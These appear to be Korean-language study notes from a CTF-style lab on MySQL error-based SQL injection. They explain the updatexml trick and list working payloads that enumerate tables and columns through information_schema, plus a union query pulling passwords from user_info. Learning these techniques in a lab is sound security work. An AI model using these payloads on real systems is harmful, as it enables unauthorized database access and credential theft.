** Error Based SQLi
-> SQL 에러가 응답에 포함되는 경우!
-> 에러를 발생시키면서 우리가 원하는 질의문을 실행하는 것!
mysql error based sql injection function
updatexml(null,':sqli',null)
:test
UPDATEXML함수는 인수로써 XMLType인스턴스와 XPath값 쌍을 취하고, 업데이트된 값을 가지는 XMLType 인스턴스를 반환한다.
updatexml(null,concat(0x3a,(select 'test')),null)
' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1
where id = '' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1'
여러가지로 실행
ID : 1' and updatexml(null,concat(0x3a,(select 'normaltic')),null) and '1'='1
select ~~~ from ~~~~ where id='1' and updatexml(null,concat(0x3a,(select 'normaltic')),null) and '1'='1'
select ~~~~~
1' and updatexml(null,concat(0x3a,(SELECT 문)),null) and '1'='1
select database()
1' and updatexml(null,concat(0x3a,(select database())),null) and '1'='1
- limit [시작위치][갯수]
select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli' limit 3, 1
1' and updatexml(null,concat(0x3a,(select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli' limit 1, 1)),null) and '1'='1
// flag_table
// member
리미트에 따른 결과 출력
1' and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_name='flag_table' limit 0, 1)),null) and '1'='1
// flag
1' union select column_name,2,3,4,5,6 from information_schema.columns where table_name='flag_table'#
select id,2,3,password,5,6 from user_info #
1' and updatexml(null,concat(0x3a,("여기" limit 0, 1)),null) and '1'='1
완 - 료